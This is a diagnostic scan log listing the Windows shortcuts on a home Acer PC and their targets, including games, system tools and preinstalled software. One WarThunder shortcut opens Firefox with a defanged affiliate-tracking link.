Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\Uninstall.lnk -> C:\Program Files\BitComet\uninst.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\Battle.net.lnk -> C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk -> C:\Windows\SysWOW64\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft® Windows® Operating System)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\abPhoto.lnk -> C:\Program Files (x86)\Acer\abPhoto\abPhoto.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Care Center.lnk -> C:\Program Files (x86)\Acer\Care Center\CareCenter.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Power Button.lnk -> C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Quick Access.lnk -> C:\Program Files\Acer\Acer Quick Access\QuickAccess.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer User Experience Improvement Program.lnk -> C:\Program Files\Acer\User Experience Improvement Program\Framework\Setting.exe (acer)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk -> C:\Windows\System32\quickassist.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk -> C:\Windows\System32\psr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonAssistant.lnk -> C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantTaskbar.exe ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\Music\Obrazy — skrót.lnk -> C:\Users\Emil\Pictures ()
Shortcut: C:\Users\Emil\Links\Desktop.lnk -> C:\Users\Emil\Desktop ()
Shortcut: C:\Users\Emil\Links\Downloads.lnk -> C:\Users\Emil\Downloads ()
Shortcut: C:\Users\Emil\Desktop\FL Studio 12 (64bit).lnk -> C:\FL Studio 12.4.2\FL64.exe (Image-Line)
Shortcut: C:\Users\Emil\Desktop\FL Studio 12.lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\Users\Emil\Desktop\Komp.lnk -> System Folder
Shortcut: C:\Users\Emil\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\Desktop\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\Desktop\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\Desktop\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\Desktop\Proje\GG.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GG.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Menedżer HD Audio.lnk -> C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk -> C:\Users\Emil\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ustawienia aktualizacji i prywatności.lnk -> C:\Windows\System32\UNP\UNPUXHost.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Enemy Territory.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\et.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Help.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\Docs\Help\index.htm ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Uninstall.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\uninstall.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\PunkBuster\PB Install.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\pb\pbsvc.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (32bit).lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (64bit).lnk -> C:\FL Studio 12.4.2\FL64.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\FL Studio 12\FL.exe (Brak pliku)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\IL Download Manager.lnk -> C:\Program Files (x86)\Image-Line\Downloader\ILDownloadManager.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\SendTo\Transfer plików Bluetooth.LNK -> C:\Windows\System32\fsquirt.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\AppData\Local\OpenFM\Application\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\GG\Application\gg.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Public\Desktop\Adobe Reader 9.lnk -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (Adobe Systems Incorporated)
Shortcut: C:\Users\Public\Desktop\Farming Simulator 17.lnk -> C:\Program Files\Farming Simulator 17\x64\FarmingSimulator2017Game.exe (GIANTS Software GmbH)
Shortcut: C:\Users\Public\Desktop\Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Public\Desktop\My Connection.lnk -> C:\Program Files (x86)\My Connection\Maincontroller.exe ()
Shortcut: C:\Users\Public\Desktop\The Sims 4.lnk -> C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe (Electronic Arts Inc.)


ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507


ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk -> C:\Program Files\Intel Security\True Key\application\truekey.exe (Intel Security) -> --open-source=startmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp ACERdt
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - wildgames.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp wildgames
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /7
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Narzędzia pakietu Microsoft Office 2016\Office 2016 Upload Center.lnk -> C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe (Microsoft Corporation) -> "C:\Program Files (x86)\Microsoft Office\Root\Office16\MSOUC.EXE"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\Odinstaluj.lnk -> C:\Program Files\McAfee Security Scan\uninstall.exe (McAfee, Inc.) -> C:\Program Files\McAfee Security Scan\3.11.523\McAfee.ico
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee\McAfee LiveSafe .lnk -> C:\Program Files\Common Files\McAfee\platform\McUICnt.exe (McAfee, Inc.) -> /desktopicon /platui
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\12 Labours of Hercules III Girl Power.lnk -> C:\Program Files (x86)\WildGames\12 Labours of Hercules III Girl Power\12LaboursOfHercules3-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Home Makeover.lnk -> C:\Program Files (x86)\WildGames\Home Makeover\HomeMakeover-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Jewel Match 3.lnk -> C:\Program Files (x86)\WildGames\Jewel Match 3\JewelMatch3-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Jewel Match Snowscapes.lnk -> C:\Program Files (x86)\WildGames\Jewel Match Snowscapes\JMS-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Magic Academy.lnk -> C:\Program Files (x86)\WildGames\Magic Academy\academy-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Polar Bowler 1st Frame.lnk -> C:\Program Files (x86)\WildGames\Polar Bowler 1st Frame\PBFF-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Rory's Restaurant.lnk -> C:\Program Files (x86)\WildGames\Rorys Restaurant\RorysRestaurant-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Runefall.lnk -> C:\Program Files (x86)\WildGames\Runefall\Runefall-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Vegas World.lnk -> C:\Program Files (x86)\WildTangent Games\Web Link - Vegas World\launcher.exe (WildTangent) -> /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Villagers and Heroes.lnk -> C:\Program Files (x86)\WildTangent Games\Web Link - Villagers and Heroes\launcher.exe (WildTangent) -> /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\WildTangent Games App - acer.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp ACERdt
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\WildTangent Games App - wildgames.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp wildgames
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\abFiles.lnk -> C:\Program Files (x86)\Acer\abFiles\abFilesTrayIcon.exe (acer) -> 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Recovery Management.lnk -> C:\Program Files (x86)\Acer\Care Center\CareCenter.exe () -> eRecovery
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Dokumenty Acer.lnk -> C:\OEM\Preload\Autorun\GUI\Acer User's Manual\00\OnePager.exe () -> /folder
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{a4744eb8-e18d-4808-a161-5af6b46992e5}\PlayTasks\0\Rory's Restaurant.lnk -> C:\Program Files (x86)\WildGames\Rorys Restaurant\RorysRestaurant-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{922028cd-48ee-4fac-b702-091641a630a3}\PlayTasks\0\Runefall.lnk -> C:\Program Files (x86)\WildGames\Runefall\Runefall-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{5efc38bb-2dab-4442-8e97-38975fa121af}\PlayTasks\0\Magic Academy.lnk -> C:\Program Files (x86)\WildGames\Magic Academy\academy-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{4ab17087-5348-4a14-8af5-cd43a0707d5f}\PlayTasks\0\Polar Bowler 1st Frame.lnk -> C:\Program Files (x86)\WildGames\Polar Bowler 1st Frame\PBFF-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
